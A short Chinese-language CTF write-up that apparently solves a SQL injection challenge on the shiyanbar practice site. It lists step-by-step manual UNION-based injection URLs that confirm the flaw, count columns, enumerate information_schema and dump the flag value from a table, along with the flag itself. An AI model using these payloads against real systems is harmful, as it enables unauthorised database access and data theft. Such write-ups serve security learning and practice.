实验吧 sql注入

题目链接：http://ctf5.shiyanbar.com/8/index.php?id=1

手动注入

1. 判断是否存在sql注入
   ctf5.shiyanbar.com/8/index.php?id=1' 报错
   
   ctf5.shiyanbar.com/8/index.php?id=1 and 1=1 正常打开
   ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 正常打开
   存在sql注入

2. 判断POC
   http://ctf5.shiyanbar.com/8/index.php?id=1 or 1=1
   

3. 查询字段数
   http://ctf5.shiyanbar.com/8/index.php?id=1 order by 1 正常显示
   http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2 正常显示 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3 报错
   字段数为2

4. 查询数据库
   http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2
   查到数据库 my_db

5. 查询数据表
   http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_schema,table_name from information_schema.tables
   
   查到数据表 thiskey

6. 查询表
   http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_name,column_name from information_schema.columns
   查到表 k0y

7. 读取值
   http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
   

   读到值 whatiMyD91dump